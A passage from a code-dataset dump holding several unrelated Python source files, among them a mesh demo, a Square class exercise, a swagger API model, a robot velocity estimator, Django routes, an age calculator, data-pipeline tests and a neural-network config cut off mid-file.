def create_node(self, index=0):\n return Node.create_node(grid=self.GRID, index=index)\n\n def create_triangle(self, index=0):\n return Triangle.create_triangle(grid=self.GRID, index=index)\n\n\nif __name__ == '__main__':\n ms = Mesh(partition=4)\n nd31 = ms.create_node(index=31)\n print('-'*10)\n for ns in nd31.neighboring_nodes:\n print(ns)\n print('-' * 10)\n for ts in nd31.adjacent_triangles:\n print(ts)\n print('-' * 10)\n tr31 = ms.create_triangle(index=31)\n print('-' * 10)\n for ns in tr31.triangle_nodes:\n print(ns)\n\n # grd = Grid(-10)\n","repo_name":"ax-va/Project-PyGlobe3D","sub_path":"pyglobe3d/core/icosalogic/mesh.py","file_name":"mesh.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18389046436","text":"#!/usr/bin/python3\n\"\"\" this module represents a class square \"\"\"\n\n\nclass Square:\n \"\"\"Represents a square class \"\"\"\n def __init__(self, size=0):\n \"\"\"Initialize data with constructor\"\"\"\n\n if type(size) != int:\n raise TypeError(\"size must be an integer\")\n elif size < 0:\n raise ValueError(\"size must be >= 0\")\n else:\n self.__size = size\n\n @property\n def size(self):\n return self.__size\n\n @size.setter\n def size(self, new_size):\n if type(new_size) != int:\n raise TypeError(\"size must be an integer\")\n elif new_size < 0:\n raise ValueError(\"size must be >= 0\")\n else:\n self.__size = new_size\n\n def area(self):\n \"\"\" Returns the area of a square \"\"\"\n return (self.__size * self.__size)\n\n def my_print(self):\n \"\"\" prints # on stdout\"\"\"\n if self.__size == 0:\n print()\n else:\n for i in range(self.__size):\n print(\"#\" * self.__size)\n","repo_name":"ChinenyeNmoh/alx-higher_level_programming","sub_path":"0x06-python-classes/5-square.py","file_name":"5-square.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40646308010","text":"# coding: utf-8\n\n\"\"\"\n College Football Data API\n\n This is an API for accessing all sorts of college football data. Please note that API keys should be supplied with \\\"Bearer \\\" prepended (e.g. \\\"Bearer your_key\\\"). API keys can be acquired from the CollegeFootballData.com website. # noqa: E501\n\n OpenAPI spec version: 4.5.1\n Contact: admin@collegefootballdata.com\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom cfbd.configuration import Configuration\n\n\nclass TeamFPIRatingResumeRanks(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'strength_of_record': 'int',\n 'fpi': 'int',\n 'average_win_probability': 'int',\n 'strength_of_schedule': 'int',\n 'remaining_strength_of_schedule': 'int',\n 'game_control': 'int'\n }\n\n attribute_map = {\n 'strength_of_record': 'strengthOfRecord',\n 'fpi': 'fpi',\n 'average_win_probability': 'averageWinProbability',\n 'strength_of_schedule': 'strengthOfSchedule',\n 'remaining_strength_of_schedule': 'remainingStrengthOfSchedule',\n 'game_control': 'gameControl'\n }\n\n def __init__(self, strength_of_record=None, fpi=None, average_win_probability=None, strength_of_schedule=None, remaining_strength_of_schedule=None, game_control=None, _configuration=None): # noqa: E501\n \"\"\"TeamFPIRatingResumeRanks - a model defined in Swagger\"\"\" # noqa: E501\n if _configuration is None:\n _configuration = Configuration()\n self._configuration = _configuration\n\n self._strength_of_record = None\n self._fpi = None\n self._average_win_probability = None\n self._strength_of_schedule = None\n self._remaining_strength_of_schedule = None\n self._game_control = None\n self.discriminator = None\n\n if strength_of_record is not None:\n self.strength_of_record = strength_of_record\n if fpi is not None:\n self.fpi = fpi\n if average_win_probability is not None:\n self.average_win_probability = average_win_probability\n if strength_of_schedule is not None:\n self.strength_of_schedule = strength_of_schedule\n if remaining_strength_of_schedule is not None:\n self.remaining_strength_of_schedule = remaining_strength_of_schedule\n if game_control is not None:\n self.game_control = game_control\n\n @property\n def strength_of_record(self):\n \"\"\"Gets the strength_of_record of this TeamFPIRatingResumeRanks. # noqa: E501\n\n\n :return: The strength_of_record of this TeamFPIRatingResumeRanks. # noqa: E501\n :rtype: int\n \"\"\"\n return self._strength_of_record\n\n @strength_of_record.setter\n def strength_of_record(self, strength_of_record):\n \"\"\"Sets the strength_of_record of this TeamFPIRatingResumeRanks.\n\n\n :param strength_of_record: The strength_of_record of this TeamFPIRatingResumeRanks. # noqa: E501\n :type: int\n \"\"\"\n\n self._strength_of_record = strength_of_record\n\n @property\n def fpi(self):\n \"\"\"Gets the fpi of this TeamFPIRatingResumeRanks. # noqa: E501\n\n\n :return: The fpi of this TeamFPIRatingResumeRanks. # noqa: E501\n :rtype: int\n \"\"\"\n return self._fpi\n\n @fpi.setter\n def fpi(self, fpi):\n \"\"\"Sets the fpi of this TeamFPIRatingResumeRanks.\n\n\n :param fpi: The fpi of this TeamFPIRatingResumeRanks. # noqa: E501\n :type: int\n \"\"\"\n\n self._fpi = fpi\n\n @property\n def average_win_probability(self):\n \"\"\"Gets the average_win_probability of this TeamFPIRatingResumeRanks. # noqa: E501\n\n\n :return: The average_win_probability of this TeamFPIRatingResumeRanks. # noqa: E501\n :rtype: int\n \"\"\"\n return self._average_win_probability\n\n @average_win_probability.setter\n def average_win_probability(self, average_win_probability):\n \"\"\"Sets the average_win_probability of this TeamFPIRatingResumeRanks.\n\n\n :param average_win_probability: The average_win_probability of this TeamFPIRatingResumeRanks. # noqa: E501\n :type: int\n \"\"\"\n\n self._average_win_probability = average_win_probability\n\n @property\n def strength_of_schedule(self):\n \"\"\"Gets the strength_of_schedule of this TeamFPIRatingResumeRanks. # noqa: E501\n\n\n :return: The strength_of_schedule of this TeamFPIRatingResumeRanks. # noqa: E501\n :rtype: int\n \"\"\"\n return self._strength_of_schedule\n\n @strength_of_schedule.setter\n def strength_of_schedule(self, strength_of_schedule):\n \"\"\"Sets the strength_of_schedule of this TeamFPIRatingResumeRanks.\n\n\n :param strength_of_schedule: The strength_of_schedule of this TeamFPIRatingResumeRanks. # noqa: E501\n :type: int\n \"\"\"\n\n self._strength_of_schedule = strength_of_schedule\n\n @property\n def remaining_strength_of_schedule(self):\n \"\"\"Gets the remaining_strength_of_schedule of this TeamFPIRatingResumeRanks. # noqa: E501\n\n\n :return: The remaining_strength_of_schedule of this TeamFPIRatingResumeRanks. # noqa: E501\n :rtype: int\n \"\"\"\n return self._remaining_strength_of_schedule\n\n @remaining_strength_of_schedule.setter\n def remaining_strength_of_schedule(self, remaining_strength_of_schedule):\n \"\"\"Sets the remaining_strength_of_schedule of this TeamFPIRatingResumeRanks.\n\n\n :param remaining_strength_of_schedule: The remaining_strength_of_schedule of this TeamFPIRatingResumeRanks. # noqa: E501\n :type: int\n \"\"\"\n\n self._remaining_strength_of_schedule = remaining_strength_of_schedule\n\n @property\n def game_control(self):\n \"\"\"Gets the game_control of this TeamFPIRatingResumeRanks. # noqa: E501\n\n\n :return: The game_control of this TeamFPIRatingResumeRanks. # noqa: E501\n :rtype: int\n \"\"\"\n return self._game_control\n\n @game_control.setter\n def game_control(self, game_control):\n \"\"\"Sets the game_control of this TeamFPIRatingResumeRanks.\n\n\n :param game_control: The game_control of this TeamFPIRatingResumeRanks. # noqa: E501\n :type: int\n \"\"\"\n\n self._game_control = game_control\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(TeamFPIRatingResumeRanks, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, TeamFPIRatingResumeRanks):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, TeamFPIRatingResumeRanks):\n return True\n\n return self.to_dict() != other.to_dict()\n","repo_name":"CFBD/cfbd-python","sub_path":"cfbd/models/team_fpi_rating_resume_ranks.py","file_name":"team_fpi_rating_resume_ranks.py","file_ext":"py","file_size_in_byte":8350,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"72"} +{"seq_id":"40348990374","text":"\"\"\"State estimator.\"\"\"\nimport numpy as np\nimport pybullet as p\nfrom typing import Any, Sequence\n\nfrom src.robots import a1_robot\nfrom src.convex_mpc_controller.gait_generator import LegState\nfrom src.utilities.moving_window_filter import MovingWindowFilter\n\n_DEFAULT_WINDOW_SIZE = 20\n\n\nclass COMVelocityEstimator(object):\n \"\"\"Estimate the CoM velocity using on board sensors.\n\n\n Requires knowledge about the base velocity in world frame, which for example\n can be obtained from a MoCap system. This estimator will filter out the high\n frequency noises in the velocity so the results can be used with controllers\n reliably.\n\n \"\"\"\n def __init__(self,\n robot: Any,\n velocity_window_size: int = _DEFAULT_WINDOW_SIZE,\n ground_normal_window_size: int = _DEFAULT_WINDOW_SIZE):\n self._robot = robot\n self._velocity_window_size = velocity_window_size\n self._ground_normal_window_size = ground_normal_window_size\n self._last_desired_leg_state = [LegState.STANCE] * 4\n self._swing_force_history = [[], [], [], []]\n self._ground_normal = np.array([0., 0., 1.])\n self.reset(0)\n\n def reset(self, current_time):\n del current_time\n # We use a moving window filter to reduce the noise in velocity estimation.\n self._velocity_filter = MovingWindowFilter(\n window_size=self._velocity_window_size)\n self._ground_normal_filter = MovingWindowFilter(\n window_size=self._ground_normal_window_size)\n\n self._com_velocity_world_frame = np.array((0, 0, 0))\n self._com_velocity_body_frame = np.array((0, 0, 0))\n\n def _compute_ground_normal(self, contact_foot_positions):\n \"\"\"Computes the surface orientation in robot frame based on foot positions.\n Solves a least squares problem, see the following paper for details:\n https://ieeexplore.ieee.org/document/7354099\n \"\"\"\n contact_foot_positions = np.array(contact_foot_positions)\n normal_vec = np.linalg.lstsq(contact_foot_positions, np.ones(4))[0]\n normal_vec /= np.linalg.norm(normal_vec)\n if normal_vec[2] < 0:\n normal_vec = -normal_vec\n return normal_vec\n\n def update(self, desired_leg_state):\n # Update foot force calibration\n if isinstance(self._robot, a1_robot.A1Robot):\n for leg_id in range(4):\n if desired_leg_state[leg_id] == LegState.SWING:\n self._swing_force_history[leg_id].append(\n self._robot.foot_forces[leg_id])\n if desired_leg_state[\n leg_id] == LegState.STANCE and self._last_desired_leg_state[\n leg_id] == LegState.SWING:\n # Transition from swing to stance, update sensor calibration\n avg_swing_force = np.mean(self._swing_force_history[leg_id])\n self._robot.update_foot_contact_force_threshold(\n leg_id, avg_swing_force + 10)\n self._swing_force_history[leg_id] = []\n self._last_desired_leg_state = desired_leg_state\n\n # Update velocity\n velocity = np.array(self._robot.base_velocity)\n self._com_velocity_world_frame = self._velocity_filter.calculate_average(\n velocity)\n\n base_orientation = self._robot.base_orientation_quat\n _, inverse_rotation = self._robot.pybullet_client.invertTransform(\n (0, 0, 0), base_orientation)\n\n self._com_velocity_body_frame, _ = (\n self._robot.pybullet_client.multiplyTransforms(\n (0, 0, 0), inverse_rotation, self._com_velocity_world_frame,\n (0, 0, 0, 1)))\n\n ground_normal_vector = self._compute_ground_normal(\n self._robot.foot_contact_history)\n self._ground_normal = self._ground_normal_filter.calculate_average(\n ground_normal_vector)\n self._ground_normal /= np.linalg.norm(self._ground_normal)\n\n @property\n def com_position_ground_frame(self):\n foot_contacts = self._robot.foot_contacts.copy()\n if np.sum(foot_contacts) == 0:\n return np.array((0, 0, self._robot.mpc_body_height))\n else:\n foot_positions_robot_frame = self._robot.foot_positions_in_base_frame\n ground_orientation_matrix_robot_frame = p.getMatrixFromQuaternion(\n self.ground_orientation_robot_frame)\n ground_orientation_matrix_robot_frame = np.array(\n ground_orientation_matrix_robot_frame).reshape((3, 3))\n foot_positions_ground_frame = (foot_positions_robot_frame.dot(\n ground_orientation_matrix_robot_frame.T))\n foot_heights = -foot_positions_ground_frame[:, 2]\n return np.array((\n 0,\n 0,\n np.sum(foot_heights * foot_contacts) / np.sum(foot_contacts),\n ))\n\n @property\n def com_orientation_quat_ground_frame(self):\n _, orientation = p.invertTransform([0., 0., 0.],\n self.ground_orientation_robot_frame)\n return np.array(orientation)\n\n @property\n def com_velocity_ground_frame(self):\n _, world_orientation_ground_frame = p.invertTransform(\n [0., 0., 0.], self.ground_orientation_world_frame)\n return np.array(\n p.multiplyTransforms([0., 0., 0.], world_orientation_ground_frame,\n self._com_velocity_world_frame,\n [0., 0., 0., 1.])[0])\n\n @property\n def com_rpy_rate_ground_frame(self):\n com_quat_world_frame = p.getQuaternionFromEuler(self._robot.base_rpy_rate)\n _, world_orientation_ground_frame = p.invertTransform(\n [0., 0., 0.], self.ground_orientation_world_frame)\n _, com_quat_ground_frame = p.multiplyTransforms(\n [0., 0., 0.], world_orientation_ground_frame, [0., 0., 0.],\n com_quat_world_frame)\n return np.array(p.getEulerFromQuaternion(com_quat_ground_frame))\n\n @property\n def com_velocity_body_frame(self) -> Sequence[float]:\n \"\"\"The base velocity projected in the body aligned inertial frame.\n\n The body aligned frame is a intertia frame that coincides with the body\n frame, but has a zero relative velocity/angular velocity to the world frame.\n\n Returns:\n The com velocity in body aligned frame.\n \"\"\"\n return self._com_velocity_body_frame\n\n @property\n def ground_normal(self):\n return self._ground_normal\n\n @property\n def gravity_projection_vector(self):\n _, world_orientation_ground_frame = p.invertTransform(\n [0., 0., 0.], self.ground_orientation_world_frame)\n return np.array(\n p.multiplyTransforms([0., 0., 0.], world_orientation_ground_frame,\n [0., 0., 1.], [0., 0., 0., 1.])[0])\n\n @property\n def ground_orientation_robot_frame(self):\n normal_vec = self.ground_normal\n axis = np.array([-normal_vec[1], normal_vec[0], 0])\n axis /= np.linalg.norm(axis)\n angle = np.arccos(normal_vec[2])\n return np.array(p.getQuaternionFromAxisAngle(axis, angle))\n\n @property\n def ground_orientation_world_frame(self) -> Sequence[float]:\n return np.array(\n p.multiplyTransforms([0., 0., 0.], self._robot.base_orientation_quat,\n [0., 0., 0.],\n self.ground_orientation_robot_frame)[1])\n","repo_name":"yxyang/fast_and_efficient","sub_path":"src/convex_mpc_controller/com_velocity_estimator.py","file_name":"com_velocity_estimator.py","file_ext":"py","file_size_in_byte":7000,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"72"} +{"seq_id":"13494935671","text":"from django.urls import path\nfrom .views import account_view, edit_account_view, crop_image, edit_bio\n\napp_name = \"account\"\n\nurlpatterns = [\n path(\"/\", account_view, name=\"account\"),\n path(\"/edit/\", edit_account_view, name=\"edit\"),\n path(\"/edit/cropImg/\", crop_image, name=\"crop\"),\n path(\"edit/bio/\", edit_bio, name=\"edit bio\"),\n]\n","repo_name":"rockingrohit9639/realtime-chat","sub_path":"account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"6144473099","text":"\ndef lin():\n print(\"\\033[1;32m==\\033[0;0m\" * 30)\n\n\ndef idade(ano, mes, dia):\n from datetime import date\n atual_ano = date.today().year\n atual_mes = date.today().month\n atual_dia = date.today().day\n idade = atual_ano - ano\n if idade < 0:\n return f\"\\033[1;31mValor inválido. Reinicie o programa e tente novamente.\\033[0;0m\"\n else:\n if mes <= atual_mes:\n lin()\n print(f\"Você possui {idade} ano(s), {abs(atual_mes - mes)} mes(es) e {abs(atual_dia - dia)} dia(s).\")\n lin()\n \n idade_dias = (idade * 365) + (mes * 30) + dia\n return f\"\\033[1;34mSua idade em dias é {idade_dias}.\\033[0;0m\"\n lin()\n \n else:\n lin()\n print(f\"Você possui {idade - 1} ano(s), {abs(atual_mes)} mes(es) e {abs(atual_dia - dia)} dia(s).\")\n lin()\n \n idade_dias = (idade * 365) + (mes * 30) + dia\n return f\"\\033[1;34mSua idade em dias é {idade_dias}.\\033[0;0m\"\n lin()\n \n\n\nano = int(input(\"Em que ano você nasceu? \"))\nmes = int(input(\"Em que mês você nasceu? \"))\ndia = int(input(\"Em qual dia você nasceu? \"))\n\nlin()\nprint(idade(ano, mes, dia))\n","repo_name":"marianabsctba/Python_Pygame","sub_path":"Questão02_versão02_TP1.py","file_name":"Questão02_versão02_TP1.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"77532999","text":"import allure\nimport json\nimport pytest\n\nfrom datetime import datetime, timedelta\nfrom collections import defaultdict\n\nfrom crypta.lib.python.identifiers.identifiers import GenericID\nfrom crypta.lib.python.yql_runner.tests import canonize_output\n\nfrom crypta.graph.soup.config.python import ( # noqa\n ID_TYPE as id_type,\n SOURCE_TYPE as source_type,\n LOG_SOURCE as log_source,\n EDGE_TYPE as edges,\n)\n\n\nTEST_FAILED = False\n\nYT_DIR = \"yt-data\"\nYT_ID = \"yt-graph-all-local-test\"\nPROXY_PORT = 9013\n\nDEVID_RAW_PATH = \"//crypta/production/state/graph/indevice/2016-04-11/perfect/devid_month/\"\nPAIRS_PATH = \"//crypta/production/state/graph/2016-04-11/pairs/\"\n\n\ndef get_file_uploads():\n import yatest\n\n geodata = yatest.common.build_path(\"crypta/graph/v1/tests/sandbox-data/geodata4.bin\")\n url_to_groups = yatest.common.build_path(\"crypta/graph/v1/tests/sandbox-data/UrlToGroups.yaml\")\n dt = datetime.now() - timedelta(days=1)\n return [\n (geodata, \"//statbox/statbox-dict-last/geodata4.bin\"),\n (url_to_groups, dt.strftime(\"//statbox/statbox-dict-by-name/UrlToGroups.yaml/%Y-%m-%d\")),\n ]\n\n\n@pytest.mark.usefixtures(\"graph\")\n@pytest.mark.usefixtures(\"ytlocal\")\n@pytest.mark.usefixtures(\"crypta_env\")\n@pytest.mark.usefixtures(\"stream_import_dyntable\")\nclass TestGraphAllLocal(object):\n def test_graph_run(self, graph):\n allure.attach(\"YT errors\", (json.dumps(graph.report.errors, sort_keys=True, indent=4)))\n allure.attach(\"Max execution time\", str(graph.report.max_time))\n assert not graph.report.errors\n assert graph.report.max_time < timedelta(minutes=10)\n if graph.run_status is None:\n assert 0, \"Graph run status is not defined\"\n assert graph.run_status, \"Graph fail\"\n\n @canonize_output\n def test_graph_canon_tables(self, graph):\n return sorted(\n [\n str(table)\n for root in (\"//home\", \"//crypta\", \"//statbox\", \"//logs\")\n for table in graph.yt.search(\n root, node_type=(\"table\",), follow_links=True, attributes=(\"_yql_row_spec\",)\n )\n ]\n )\n\n def test_yuid_apps(self, graph):\n yuid_apps = \"//crypta/production/state/graph/2016-04-11/yuid_apps\"\n yuid_apps_upload = \"//crypta/production/state/graph/2016-04-11/yuid_apps_upload\"\n assert graph.yt.exists(yuid_apps)\n assert graph.yt.row_count(yuid_apps) > 0\n assert graph.yt.exists(yuid_apps_upload)\n assert graph.yt.row_count(yuid_apps_upload) > 0\n\n def test_no_dump_soup_dups(self, graph):\n logins = \"//crypta/production/state/graph/v2/soup/puid_login_passport-profile_passport-dict\"\n counts = defaultdict(int)\n for rec in graph.yt.read_table(logins):\n counts[(rec[\"id1\"], rec[\"id2\"])] += 1\n\n assert all([x == 1 for x in counts.values()])\n logins = set([x[1] for x in counts.keys()])\n assert \"govshit\" in logins\n\n def test_email_to_phone(self, graph):\n email_to_phone = \"//crypta/production/state/graph/v2/soup/email_phone_email-to-phone_preproc\"\n assert graph.yt.row_count(email_to_phone) == 1\n rec = next(graph.yt.read_table(email_to_phone))\n assert rec[\"id1\"] == \"89518545837@gmail.com\"\n assert rec[\"id2\"] == \"+79518545837\"\n\n def test_market_orders_log(self, graph):\n email_phone = \"//crypta/production/state/graph/v2/soup/email_phone_orders_yandex-market\"\n email_puid = \"//crypta/production/state/graph/v2/soup/email_puid_orders_yandex-market\"\n email_uuid = \"//crypta/production/state/graph/v2/soup/email_uuid_orders_yandex-market\"\n email_yandexuid = \"//crypta/production/state/graph/v2/soup/email_yandexuid_orders_yandex-market\"\n phone_puid = \"//crypta/production/state/graph/v2/soup/phone_puid_orders_yandex-market\"\n phone_uuid = \"//crypta/production/state/graph/v2/soup/phone_uuid_orders_yandex-market\"\n phone_yandexuid = \"//crypta/production/state/graph/v2/soup/phone_yandexuid_orders_yandex-market\"\n puid_uuid = \"//crypta/production/state/graph/v2/soup/puid_uuid_orders_yandex-market\"\n\n assert graph.yt.row_count(email_phone) == 1\n assert graph.yt.row_count(email_puid) == 2\n assert graph.yt.row_count(email_uuid) == 1\n assert graph.yt.row_count(email_yandexuid) == 1\n assert graph.yt.row_count(phone_puid) == 1\n assert graph.yt.row_count(phone_uuid) == 1\n assert graph.yt.row_count(phone_yandexuid) == 1\n assert graph.yt.row_count(puid_uuid) == 1\n\n rec = next(graph.yt.read_table(email_phone))\n assert rec[\"id1\"] == \"marketemail@orders.ru\"\n assert rec[\"id2\"] == \"+79161234567\"\n\n @pytest.mark.parametrize(\n \"id_type,old_id\",\n [\n (\"yandexuid\", \"999999991543414614\"),\n (\"icookie\", \"999999991543414614\"),\n (\"idfa\", \"DEADBEEF-C0DE-CAFE-BABE-8BADF00DDEAD\"),\n (\"gaid\", \"deadbeef-c0de-cafe-babe-8badf00ddead\"),\n (\"mm_device_id\", \"deadbeef-c0de-cafe-babe-8badf00ddead\"),\n (\"uuid\", \"deadbeefc0decafebabe8badf00ddead\"),\n ],\n )\n def test_eternal_idstorage(self, graph, id_type, old_id):\n info = list(graph.yt.read_table(\"//crypta/production/ids_storage/{}/eternal\".format(id_type)))\n assert len(info) > 1\n assert len({x[\"id_type\"] for x in info}) == 1\n assert info[0][\"id_type\"] == id_type\n assert old_id in {x[\"id\"] for x in info}\n ids = [x[\"id\"] for x in info]\n valid = [GenericID(id_type, x).is_valid() for x in ids]\n assert all(valid), \"Waiter, there are invalid identifiers in my soup! (%s)\" % str(zip(ids, valid))\n\n def test_yandex_drive_shared(self, graph):\n yandex_drive = \"//crypta/production/state/graph/shared/yandex_drive/2016-04-11\"\n assert graph.yt.exists(yandex_drive)\n assert graph.yt.row_count(yandex_drive) == 3\n rec = next(graph.yt.read_table(yandex_drive))\n assert rec[\"id\"] == \"00002907a397aea15dbfbdcf0472a112\"\n assert rec[\"id_type\"] == \"mm_device_id\"\n assert rec[\"source\"] == \"Yandex Drive\"\n\n assert graph.yt.exists(\"//crypta/production/ids_storage/uuid/yandex_drive\")\n assert graph.yt.row_count(\"//crypta/production/ids_storage/uuid/yandex_drive\") == 2\n assert graph.yt.exists(\"//crypta/production/ids_storage/mm_device_id/yandex_drive\")\n assert graph.yt.row_count(\"//crypta/production/ids_storage/mm_device_id/yandex_drive\") == 1\n\n def test_merge_shared(self, graph):\n shared_merged = \"//crypta/production/state/graph/shared/merged/2016-04-11\"\n assert graph.yt.exists(shared_merged)\n assert graph.yt.row_count(shared_merged) == 5\n rec = next(graph.yt.read_table(shared_merged))\n assert rec[\"id\"] == \"00002907a397aea15dbfbdcf0472a112\"\n assert rec[\"id_type\"] == \"mm_device_id\"\n assert rec[\"source\"] == [\"Yandex Drive\"]\n\n shared = \"//crypta/production/ids_storage/shared/common_shared\"\n assert graph.yt.exists(shared)\n assert graph.yt.row_count(shared) == 5\n rec = next(graph.yt.read_table(shared))\n assert rec[\"id\"] == \"00002907a397aea15dbfbdcf0472a112\"\n assert rec[\"id_type\"] == \"mm_device_id\"\n assert rec[\"shared_types\"] == [\"YANDEX_DRIVE\"]\n\n def test_heuristic_desktop_shared_yuids(self, graph):\n heuristic_desktop_shared_yuids = \"//crypta/production/state/graph/shared/heuristic_desktop_yuids/2016-04-11\"\n assert graph.yt.exists(heuristic_desktop_shared_yuids)\n assert graph.yt.row_count(heuristic_desktop_shared_yuids) == 2\n rec = next(graph.yt.read_table(heuristic_desktop_shared_yuids))\n assert rec[\"id\"] == \"601826891455541119\"\n assert rec[\"id_type\"] == \"yandexuid\"\n assert rec[\"source\"] == \"Heuristic shared desktop yuid\"\n\n @pytest.mark.parametrize(\n \"id1_type, id2_type, source_type\",\n (\n (id_type.LOGIN, id_type.EMAIL, source_type.LOGIN_TO_EMAIL),\n (id_type.EMAIL, id_type.PHONE, source_type.EMAIL_TO_PHONE),\n (id_type.EMAIL, id_type.EMAIL_MD5, source_type.MD5_HASH),\n (id_type.EMAIL, id_type.EMAIL_SHA256, source_type.SHA256_HASH),\n (id_type.EMAIL_MD5, id_type.EMAIL_SHA256, source_type.HASH_TO_HASH),\n (id_type.PHONE, id_type.PHONE_MD5, source_type.MD5_HASH),\n ),\n )\n def test_soup_cooked_soup_preprocessing_edges(self, graph, id1_type, id2_type, source_type):\n \"\"\"Should check is soup preprocessing tables are correctly created\"\"\"\n table_path = \"//crypta/production/state/graph/v2/soup/{table_name}\".format(\n table_name=edges.name(edges.get_edge_type(id1_type, id2_type, source_type, log_source.SOUP_PREPROCESSING))\n )\n assert graph.yt.exists(table_path)\n assert graph.yt.row_count(table_path) > 0\n record = next(graph.yt.read_table(table_path))\n assert record[\"id1Type\"] == id1_type.Name\n assert record[\"id2Type\"] == id2_type.Name\n assert record[\"sourceType\"] == source_type.Name\n # check is identifiers are valid\n assert GenericID(id1_type.Name, record[\"id1\"]).is_valid()\n assert GenericID(id2_type.Name, record[\"id2\"]).is_valid()\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"crypto/test-graph-all/test_graph_all_local.py","file_name":"test_graph_all_local.py","file_ext":"py","file_size_in_byte":9279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33853541523","text":"\nDATA_DIR_PATH = './data'\nNET_DIR_PATH = './nets'\nRESULTS_DIR_PATH = './results'\n\nWDBC_LRATE = 0.1\nWDBC_NEPOCH = 100\n\nGRADES_LRATE = 0.05\nGRADES_NEPOCH = 100\n\nAUDIT_LRATE = 0.05\nAUDIT_NEPOCH = 100\n\nCONFIGS = {\n\t'WDBC' : {\n\t\t'TRAIN': {\n\t\t\t'learning_rate' : WDBC_LRATE,\n\t 'num_epoch' : WDBC_NEPOCH,\n\t 'init_network_filename' :'sample.NNWDBC.init',\n\t 'training_data_filename' : 'wdbc.train',\n\t 'trained_network_filename' : 'kevin.NNWDBC.{0}.{1}.trained'.format( str(WDBC_LRATE).split('.')[1], WDBC_NEPOCH )\n\t\t}, \n\t\t'TEST': {\n\t\t\t'trained_network_filename' : 'kevin.NNWDBC.{0}.{1}.trained'.format( str(WDBC_LRATE).split('.')[1], WDBC_NEPOCH ),\n\t\t\t'testing_data_filename' : 'wdbc.test',\n\t\t\t'results_filename' : 'kevin.NNWDBC.{0}.{1}.results'.format( str(WDBC_LRATE).split('.')[1], WDBC_NEPOCH )\n\t\t}\n\t}, \n\t'Grades' : {\n\t\t'TRAIN': {\n\t\t\t'learning_rate' : GRADES_LRATE,\n\t 'num_epoch' : GRADES_NEPOCH,\n\t 'init_network_filename' : 'sample.NNGrades.init',\n\t 'training_data_filename' : 'grades.train',\n\t 'trained_network_filename' : 'kevin.NNGrades.{0}.{1}.trained'.format( str(GRADES_LRATE).split('.')[1], GRADES_NEPOCH )\n\t\t}, \n\t\t'TEST' : {\n\t\t\t'trained_network_filename' : 'kevin.NNGrades.{0}.{1}.trained'.format( str(GRADES_LRATE).split('.')[1], GRADES_NEPOCH ),\n\t 'testing_data_filename' : 'grades.test', \n\t \t'results_filename' : 'kevin.NNGrades.{0}.{1}.results'.format( str(GRADES_LRATE).split('.')[1], GRADES_NEPOCH ) \n\t\t}\n\t},\n\n\t# CHANGE THIS STUFF TO LOAD Audit risk NETWORK AND STUFF\n\t'WDBC_mini' : {\n\t\t'TRAIN': {\n\t\t\t'learning_rate' : WDBC_LRATE,\n\t 'num_epoch' : 1,\n\t 'init_network_filename' :'sample.NNWDBC.init',\n\t 'training_data_filename' : 'wdbc.mini_train',\n\t 'trained_network_filename' : 'kevin.NNWDBC.{0}.1.mini_trained'.format( str(WDBC_LRATE).split('.')[1], 1 )\n\t\t}, \n\t\t'TEST': {\n\t\t\t'trained_network_filename' : 'kevin.NNWDBC.{0}.1.trained'.format( str(WDBC_LRATE).split('.')[1], 1 ),\n\t\t\t'testing_data_filename' : 'wdbc.test',\n\t\t\t'results_filename' : 'kevin.NNWDBC.{0}.1.results'.format( str(WDBC_LRATE).split('.')[1], 1 )\n\t\t}\n\t},\n\n\n\t# CHANGE THIS STUFF TO LOAD Audit risk NETWORK AND STUFF\n\t'Audit' : {\n\t\t'TRAIN': {\n\t\t\t'learning_rate' : AUDIT_LRATE,\n\t 'num_epoch' : AUDIT_NEPOCH,\n\t 'init_network_filename' : 'kevin.NNAudit.init',\n\t 'training_data_filename' : 'auditrisk.processed.train',\n\t 'trained_network_filename' : 'kevin.NNAudit.{0}.{1}.trained'.format( str(AUDIT_LRATE).split('.')[1], AUDIT_NEPOCH )\n\t\t}, \n\t\t'TEST' : {\n\t\t\t'trained_network_filename' : 'kevin.NNAudit.{0}.{1}.trained'.format( str(AUDIT_LRATE).split('.')[1], AUDIT_NEPOCH ),\n\t 'testing_data_filename' : 